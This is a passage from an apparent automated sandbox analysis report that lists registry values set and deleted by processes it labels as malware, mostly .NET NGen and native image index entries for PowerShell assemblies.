[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EC 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 E6 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F2 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F0 00 00 00 53 00 79"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 51 2B FA DB C5 15 B9 A7 ED 69 F0 FE 0A C2 44"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
"ImageList" = "01 00 00 00 00 02 00 00 00 FC 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EE 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

The Malware deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

The process mscorsvw.exe:2588 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 34 B5 39 55 10 05 C6 5C 46 12 D8 7A DD D7 BB"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3520 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\3fa824d2\11\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"MVID" = "EA F7 7E C3 AE 2E A1 73 83 BF A6 FB A9 3D 37 37"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

